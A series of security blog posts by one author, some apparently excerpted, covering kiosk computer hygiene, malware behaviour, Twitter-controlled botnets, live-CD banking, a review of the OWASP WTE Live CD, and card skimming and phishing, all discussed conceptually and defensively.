I’m being a bit more general when I talk about kiosk systems, however.  I am speaking of systems provided for public use to allow people to check email, browse the web, or update their Facebook page.  I am talking about systems found in libraries, hotel lobbies, and sometimes airport terminals. Sometimes you have to pay a fee to use them, but quite often they’re just sitting out there for anyone to use.

Seeing these systems I have to ask myself the following question: Who maintains them? Some are provided by a 3rd-party company as a service. Other systems are probably are set up by roaming hotel or library personnel.  Perhaps they get pre-configured at headquarters and sent out to all the “branches.” Regardless, as I see them sitting there all dusty and abused with coffee cup rings on case, I have to wonder if these battered systems are ever again touched by the IT guys after their original setup. Oh sure, if  a hard drive fails or coffee gets spilled into the keyboard someone will eventually come along and fix it. But these are not my concerns.

About three years ago I was waiting in a hotel lobby for my wife when I noticed one of these systems and, given my compulsive tendency to fiddle with things, I sat down at the keyboard and started looking around.   I noticed stuff almost immediately. Shortcuts to games–obviously not installed with the original software–filled the desktop. I checked the internet cache and was not terribly surprised. Porn and gaming sites were apparently often visited on this system.

The web browser seemed very slow to come up, and when it finally appeared on the screen I started seeing quite a number of pop-up ads. This system was riddled with ad-ware and probably various kinds malware as well. I looked on the tray for some indication of anti-virus software. An expired version of Norton or something similar had been installed, but was never purchased.

However, the biggest surprise was still to come. A quick check of the Windows XP system settings revealed that the user account I was currently using, and that which dozens if not hundreds had used before me, had administrative rights on that system. This explained the seemingly endless list of software that others freely installed.  The system was a dangerous mess, and it seems to be the “norm” among those publicly available.  These systems should ALWAYS be avoided. What follows are my reasons…

First of all, giving average user administrative rights is like giving a kid a baseball bat to play with in a glass shop.  I don’t say this to be insulting, I’m just stating a fact. Malware can do irreparable damage to an operating system when it runs under an account with access to all the system files and the registry. It’s common sense, but many who set up such systems are too lazy or apathetic to care. It’s much easier just to give everyone administrative rights so that  nobody bothers you to install something or change a setting. Let them do it. It’s easier.

A few years ago I did IT administrative work for a securities trading company. I stood firm with regards to administrative rights.  Normal user accounts were not members of the local administrative group on systems. I never took the position, however, of withholding these rights as some sort of personal power trip, nor did I tell people I thought they’d break their systems. I was always quick to explain about malware and how I was trying to protect them. Heck, I even created secondary administrative accounts they could use if they needed it. I bent over backwards, but it was never  enough for some.

One lady was in constant gripe mode about not having administrative rights. I explained, and still she complained. One day, she brought her home system in and asked if I could have a look. It had gotten slow. I took it home that evening and spent an entire weekend removing dozens…no..hundreds of instances of malware.  When I brought it back, I asked her “why did your home system have so much malware and your work system does not?” Her immediate answer was “Antivirus software is better on the work system” to which I replied “Nope.”   I explained that her system was such a mess because she ran this system normally with administrative rights, giving malware much more to work with. She thanked me, gave me a case of Guinness for my work, and continued to complain, but perhaps a little less vehemently.

The point is that any system where users regularly do their day-to-day activities with administrative rights is on borrowed time. It’s like silly putty or that toy slime you sometimes buy (ok sometimes “I” buy). Once you drop it on the carpet you might as well toss it as you’ll never get out all the nasty bits  that it picks up. A kiosk system sitting in a lobby with administrative rights will pick up every bit of digital nastiness out there.

If I were evil, I believe I’d infect kiosk systems with keylogging software, collecting all the user names and passwords for every person logging in to  Paypal, Facebook, or even their bank accounts. Such logins are ripe for the harvest on kiosk systems. Keyloggers come in two varieties. Software keyloggers collect all the keystrokes through memory-resident software and then transmits this data to a 3rd party. Hardware keyloggers are devices installed between the keyboard and the system. While hardware keyloggers require the bad guy to retrieve the device at a later time, they are also nearly impossible to detect unless they are visibly noticed.

To further exacerbate the problem, often these kiosk systems are connected to the same network as everything else in the hotel. Imagine, if you will, a bit of nasty code running in memory on the kiosk system that scans the network looking for additional victims. A kiosk system could be a launching point for an attack on your laptop as you use the wireless network at the hotel, not to mention the hotel’s point of sale system and business related servers and databases. A clever virus could be written to constantly make reservations for all rooms or cancel such. Of course, I’m just thinking out loud here.

If you run a hotel or library and have such systems, here’s a couple of excellent ideas. Hint: Read all three, but pay special attention to the first two.  There’s a pop quiz at the end.

1. Use a live CD, not a hard drive. Boot the system to an Ubuntu or Knoppix Live CD and let people browse all they want. At the end of the day, reboot the system. Nothing in memory will reside, and you’ll provide a cleaner computing experience. It’s a little slower to operate from a live CD to be sure, but worth it.

2. Re-image the system daily. Create a basic system image and use this to restore the system every evening or when problems occur. This will put you back at square one every day. There really is no excuse for not at least doing this on kiosk systems.The process can even be automated to happen at night with very little effort.

3. If for some incredible reason points 1 and 2 are not available to you (which, if you’re honest, they ARE) then make sure that you have decent anti-virus software, keep the systems patched,  and, above all, do NOT give the default account administrative rights. I do not recommend this point, however. It requires some ongoing “maintenance.” You may start off with good intentions, but eventually the cares and woes of your other responsibilities will distract you and before you know it the patches and virus signatures are out of date. Then there’s that time you make an “exception” and give someone admin rights for some strange reason and then forget to revoke them. Necessity may be the mother of invention, but laziness can be it’s favorite uncle. Make your life easier and do the smart thing: Use a Live CD or re-image the systems regularly.

There are other options as well. The use of thin clients such as Citrix may be available so that the OS is not really running on the system which you are using but instead a remote server. However, such solutions are usually costly and not within the budget of most.

So what if you’re a hotel customer or you want to use that library system? Don’t do it unless you know they are following one of my first two points above. But also don’t  be afraid to bring along your own live CD and ask if you can use it. You may get strange looks or be viewed suspiciously. This is a good opportunity to introduce that library IT guy to the wonders of a clean, bootable, non-persistent environment.

If you “have” to use a kiosk without proper protection (and you never have to) then use common sense. Don’t visit sites to which you log in. If you happen to visit any such site, even on a safe system, make certain you log out completely. My wife’s family visited once and one of her relatives often used her computer for his facebook updates. Almost every time my wife sat down she found herself logged into his facebook account. (I had some really good ideas but she wouldn’t let me do anything.:-) )  Imagine a stranger sitting down at that kiosk system in the hotel finding himself logged into your online bank account or email.

Finally, I just want to say that Kiosk systems “can” be safe if those in charge follow best practice, but they should never be completely trusted. Besides, you’re on vacation. Give Facebook a rest and go to the beach.

Quiz: Which of the following is the least desirable option for keeping public systems “clean” in a hotel or library.

A) Use a live CD

B) Use a hard drive-based OS, but keep patches and anti-virus up to date.

C) Use a hard-drive based OS, but re-image or clone it daily.

The correct answer is B.

David H.

1. Parasitism-  A symbiotic relationship where one organism benefits and the other is harmed. This is a well-known type of relationship is exhibited in the way a tapeworm feeds off nutrients in the digestive track or the way a mosquito feeds from the blood of the victim organism. Some parasitic relationships can be deadly and others more benign. But even if in a small way, one organism is adversely affected.

2, Commensalism - A symbiotic relationship where one organism benefits and the other is not significantly harmed or helped. A spider building a web on a plant is a good example. Some animals rely for their dwellings on the abandoned dens of others. Egrets are often seen walking around herds of cattle, eating insects stirred up by the activity.

3. Mutualism – This is perhaps the most interesting form of symbiosis. In this relationship, both organisms benefit from each other. Certain birds eat parasitic insects from the ears and mouths of larger animals. The clownfish and the anemone protect one another. Many examples could be given for this kind of symbiosis.

Now that we’ve defined our terms, we can now see how this applies to malware.

There has always been a symbiotic relationship between malware and the system which it infects. Historically, the symbiosis has take an parasitic form. A computer is infected by a virus, and the results have been corrupted/destroyed files, pop-ups, or a system which no longer even boots. The authors of malware were motivated by notoriety.  Having their customized “you’ve been pwned!” graphic appear on the screens of millions of now incapacitated systems was their lofty goal.

The malware trend has shifted toward a more commensualistic symbiosis as the motivations behind its creation has shifted. Malware is written more for the purpose of financial gain than it is for notoriety and infamy. The contrast is stark. Attackers want to do nothing that would draw attention to their presence in your system. They would rather you carry on as usual while they use your bandwidth and processor power for their purposes. Doing harm or displaying banners is completely out of the question and counter-productive for their purposes.

This relationship has no benefit for the victim. On the contrary, the victim’s resources are being used by the attacker. In this respect, malware fails to completely rise above the level of parasite.  But for the average user, these liberties being taken by the malware largely go unnoticed. It is usually not the end-user who notices the malware but instead network adminstrator who notices the strange amount of traffic traversing his perimeter. The user is adversly affected, but only slightly, and the less the attacker can affect your system and have attention drawn to his presence, the better. The attacker strives for a purely commensalistic symbiosis.

This brings up mutualism. Does Malware ever appear in this kind of symbiosis? To my knowledge, it does not. However, imagine, if you will, an end user carelessly clicking a link and being presented the following message:

“The software you are about to install will increase your system performance by at least 20 percent and protect you from many forms of malware.”

We see something similar to this with the fake Malware remove websites. The victim is presented with progress bars and drive letters making him think that the software is cleaning malware, when instead it’s installing very bad stuff. But this is not mutualism, in which both organisms truly benefit.

What if, however, the Malware actually DID increase system peformance? What if it did protect the system from other malware?

The real question is, if malware were installed on a system where it did add that system to a botnet and use resources, but it actually boosted performance or provided some other benefits to that user, would that user care?

In future, I will post more about this and the specific application for various kinds of malware.

David H.

Using the NoScript plugin in Firefox is probably one of the best ways to avoid this trap, though I’m still trying to decide whether this provides some true, additional danger or is simply an interesting novelty. Regardless, it does take advantage of our tendency to have so many things open in our browser at one time that it would be easy to think that we actually DID open that Gmail page and simply forgot about it. I have seen end users with up to 30-40 tabs open at the same time.

I’ll probably be saying more about this as I have a look at the Javascript source that Raskin provides on his site.

David H.

Over the last couple of years Twitter has also become such a platform because of its wide accessibility.  Accounts on Twitter can easily be set up anonymously. Using a twitter client, an attacker may now control Botnet systems using a Smart Phone.  While he’s standing in the frozen food section of his local grocery store, he’s launching a DDOS attack against a network. The appeal of this is certainly understood.

A new tool called TwitterNET Builder has recently made the news as it provides script kiddies an easy way to achieve Botnet control using Twitter. The software creates an executable used to infect the target systems, causing them to watch for specific commands in specific Twitter accounts.

Twitter’s response has been swift. It seems that accounts where these commands are showing up are understandably being suspended. The same thing happened back in IRC days when accounts were found to be automatically posting such things in chat channels.  Attackers at this point would need to find a way to encode these commands in such a way as to fly under Twitter’s administrator’s radar.  The TwitterNET Builder seems to provide a certain list of commands which could be easily detected. The ability to customize the commands to use more common keywords or even encode the command text would provide more cover for the attacker.

Social Networking has always provided a stealthy platform from which attackers may control their victims. I wonder if, somewhere out there, someone’s writing “FacebookNET Builder.” Maybe it’s already being used. Setting up accounts on Facebook is a process that is a bit more involved than Twitter, so that might be an impediment for an attacker.

The best solution from the standpoint of a network administrator who desires to protect his people from these attacks would be to block Twitter and other social networking sites altogether. IRC is blocked for this very reason, and this would effectively remove the ability for an infected system tor receive instructions from its Botnet master.

The scenarios for doing evil are many, and becoming more numerous as more platforms for social networking are unveiled. Today it’s Facebook and Twitter. Tomorrow –who knows?  The question is, as these new social networking platforms are being created, are their creators thinking about how their applications could be used for evil? Probably not. But it’s such a nice thought.

David H.

http://tv.gawker.com/5526868/jon-stewart-slams-apple-over-its-handling-of-gizmodo-case

In other Apple news, Jobs explains why Flash is not supported on any of his products. They will support HTML 5 instead, but his reasoning is interesting:

Jobs begins by questioning the closed nature of the product, noting that “Adobe’s Flash products are 100% proprietary. They are only available from Adobe, and Adobe has sole authority as to their future enhancement, pricing, etc.” Closed products stifle innovation, Jobs argues.”

Uh…and Apple products are somehow more…open…than Adobe’s?  Unbelievable.

What should be alarming to all is the that this is just another step in Google’s agenda to know everything it can about you. Google has made no secret of the company’s lack of respect for privacy, taking the “if there’s something you don’t want anyone to know about maybe you shouldn’t be doing it” position. It’s an old argument used to further erode our rights. People who want privacy obviously have something to hide.

What I propose is this. Everyone who reads this who owns a wireless router, change your SSID to “GoogleStinks”  or “GooglehatesPrivacy”.  Obviously, my readership will need to expand beyond 2 people for this to make a difference.

David H.

This is a very good idea. The Live CD would not be persistent, meaning that whatever bad things are in memory would be no longer there when the system was rebooted. The user would always be greeted by the same safe, clean environment.

Making this a requirement of customers is also not a bad idea.  The session to the bank could somehow be keyed to the Live CD, making any other connection impossible. It is really more about protecting the bank than the consumer. Perhaps the FDIC could lower premiums for banks who inforce such policies and controls? <shrug>.

However, we must not fall into what I call the SSL trap. Some companies who started doing business transactions online have had a bad habit the past of telling their customers that because their site uses SSL, it’s perfectly safe from intruders. Many such companies have found out the hard way that SSL does nothing to mitigate against XSS, SQL Injection and the like.  Hopefully, banks will not think of this kind of sandboxing as a bullet proof vest either. While Malware may be virtually eliminated, other man-in-the-middle attacks still pose a threat. And let us not forget about hardware keyloggers.

I say that Malware may be “virtually” eliminated. A system booted from a live CD may be isolated from the user’s hard drive and any malware that infects it, but it is not invincible against memory-resident baddies that infect the system while the user has it up and running.I wouldn’t be surprised if malware creators shifted their attention to Ubuntu should the live CD become a popular way to do banking.  I’m also thinking about how simple it would be to create a trojan version of the LiveCD with a counterfeit label. Hey, I’m a paranoid weirdo geek. I can’t help but think of such things.

The inconvenience exists, of course, with having to reboot your system every time you want to do online banking transactions.One alternative to rebooting, however, is that he user could also install Virtualbox and run the live CD in a virtual machine. As with security controls and policies, we are always slowed down a bit. Security is no friend to efficiency. It is the price we pay.

Nonetheless, my hat’s off to the geeks working at banks who come up with these simple, elegant solutions for end-user security.
DH

I’d almost forgotten about this XKCD strip until I stumbled upon it again yesterday.

The OWASP WTE Live CD is similar but instead focuses only on web application security. The tools are designed to find vulnerabilities on web applications which could be exploited through the use of such attacks as XSS or SQL Injection, among many others. Web application security is a huge concern lately since a large number of the current attacks are levied against web applications themselves and the clients that use them. Direct attacks on firewalls or network infrastructures are comparatively in decline these days since the technology protecting networking on lower levels of the OSI model have greatly improved.

A New Distro

The Live CD has been around for some time and was formerly known as the OWASP Live CD, but the name has changed and so has the underlying operating system. The older versions were built on Slax, which has been a long-time favorite of live CD developers over the years because of its tiny profile. However, Ubuntu was chosen for probably many reasons, one of which is that time spent trying to get various hardware drivers to work could instead be spent adding new security tools. Backtrack likewise switched to Ubuntu for version 4.

What you now get is a nice, crisp desktop with everything working out of the box. You’d almost forget that it was a security distribution and just start playing with it as you would any other Linux distribution. The authors also provide VMWare and VirtualBox images. The advantages of using these over the live CDs are that 1)they are persistent, meaning changes you make, stuff you install, etc will stay between reboots and 2) that you can work with the OWASP WTE while working with your host operating system as well. Heck, fire up Backtrack in a second virtual machine and really have some fun.

The Tools

If you’re not familiar with previous revisions of the OWASP Live CD and you compare it to, say, Backtrack, you might ask “why are there so few tools?” On the current Beta release we see 25 tools listed. (Can you really count Firefox?) While the authors of the CD could answer best as to the seemingly short list of tools, I have a some ideas.

First, remember that this Live CD is focused on Web Application security. Backtrack attempts to include everything dealing with every aspect of information security, from forensics to port scanning. It’s a fairly complete collection, but as a pen tester you really only need a small subset of these tools, and if your focus is on Web Application security, your tool list becomes even shorter. You learn to sharpen your skills with a few really good tools and ignore the rest if they provide no other functionality. Backtrack has a tendency to be rather repetitive with its tools. How many port scanners do you really need?

Second, remember that web application security is only now coming of age. Knowing now that this is where the risks are, we are only now, in the last few years, starting to see the emergence of good testing tools. Perhaps this is a call to developers to provide us with even more such tools.

However, it should be pointed out that more tools are on the way. This is a very fluid project. Now, thanks to the use of Ubuntu, more work can be done to produce such packages. Also, keep in mind that with the virtualized versions of the OWASP WTE (or versions installed on a USB drive or directly on the hard drive) you have the freedom to add your own tools.

The tools included on the Live CD represent the best of the available open sources security tools for web application testing. Reconnaissance tools, fuzzers, proxies, and even automated vulnerability testers such as W3AF are standard gear. Also included are some of the basic pen testing tools such as nmap, wireshark, and netcat.

Recommendations

Some of these may already be in the works, and others may be nit-picking, but that’s my nature.

1. It’s a security distribution. We need a dark theme with a flame job and some voice as a startup sound. Maybe James Earl Jones saying “You’ve been Pwned!” Seriously though, I loved the wasp from the previous versions of the Live CD. It really stood out. The current look, hwoever is very is very clean and nice. No major complaints.

2. Firefox is installed, but what’s missing are all the cool plug-ins related to application security like Tamper Data. Even the web developer plug-in would be useful to have. (Ok, scratch this one. Included on the Live CD is a launcher for “Firefox OWASP Style” with all the plugins. We all have our idiot moments. Hey, I just realized, with the small readership I have, I could have deleted this point and nobody would have been the wiser. Oh well…)

So the only real recommendation I have at this point is James Earl Jones. That’s what you get with a preliminary look.

Conclusions

The OWASP WTE Live CD is a work in progress, but I am very impressed thus far. I am happy to see it move to an Ubuntu platform as it will open up a whole new realm of tools and packaging possibilities. I look forward to its future development and the new tools being added.

OWASP WTE Live CD Website: http://appseclive.org

Backtrack: http://www.backtrack-linux.org/

One last note: The Appseclive.org website has a lot of good information and articles pertaining to application security. Take some time to peruse their material.

In a rash of similar attacks in Utah, criminals are now placing scamming devices within “Pay-at-the-Pump” gas pumps. You can read the full story here. The way this seems to work is that a device is placed within the gas pup, skimming the credit card numbers as was done with the ATM machines. The data is transmitted via bluetooth to a nearby device to be collected later by the attacker.

How an attacker gains access to the “inside” of a gas pump is beyond me.  Some are speculating it is an inside job while others say that these pumps are physically vulnerable. However the method,  the fact that these reside within the pump makes it all the more difficult to detect, especially for the victim.

These two types of attacks remind me of similar phishing methods used by online attackers.  A victim receives an email from his bank and is told that his account has been compromised. He clicks the link to log in to his account and is greeted by the familiar login page. However, this page does not reside on his bank’s web server. Instead, it resides on the attacker’s server somewhere in Russia.  all the other links on the page do as expected and take him to actual links on his bank page. However, the button he clicks to log in sends his credentials to the attacker’s database. The attacker’s page will then redirect him to his actual bank login page. What does the victim think? He must have simply put in the wrong password. He tries again, and he’s in his account. All this transpired without the victim realizing his credentials were stolen. The fake page was designed in the same way as a the fake ATM card slot, and the clever attacker allows the victim’s login to finally achieve what the victim wants–access to his account. The attacker does not want to cause disruption to the process that would direct unwanted attention to himself.

While newsworthy, neither of these skimming attacks are commonplace. Setting them up would involve quite a lot of risk. I would say that you are as equally vulnerable to having your credit card information stolen by your waiter at a restaurant who walks off with it for 15 minutes as you are from a credit card skimmer. However, let us still show a bit more caution whenever we swipe that card. Does the device look tampered with? Perhaps it looks newer than its surrounding encloser? Do you remember that ATM card slot being so big?  Are the other ATMs the same in appearance? If the answer to any of these questions cause reasonable suspicion, then we should be discussing our concerns with the owners of the equipment.

David H.